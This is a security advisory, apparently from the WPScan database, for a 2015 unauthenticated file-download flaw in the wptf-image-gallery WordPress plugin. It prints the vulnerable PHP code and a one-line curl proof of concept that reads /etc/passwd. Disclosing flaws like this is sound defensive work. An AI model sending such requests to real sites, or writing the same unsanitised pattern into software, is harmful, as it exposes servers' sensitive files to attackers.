wptf-image-gallery 1.0.3 - Remote File Download

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files.  This allows an unauthenticated user to download sensitive system files: 


  1 <?php
  2 error_reporting(0);
  3 $homepage = file_get_contents($_GET['url']);
  4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
  5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
  6 echo $homepage;
  7 ?>
Proof of Concept
$ curl http://www.example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

Affects

Plugin wptf-image-gallery

References

EXPLOITDB 37751
URL http://www.vapid.dhs.org/advisory.php?v=148

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Website http://www.vapid.dhs.org
Submitter Twitter _larry0
Views 199
Verified No
WPVDB ID 8106

Timeline

Publicly Published 2015-07-18 (over 1 year ago)
Added 2015-07-20 (over 1 year ago)
Last Updated 2015-08-11 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.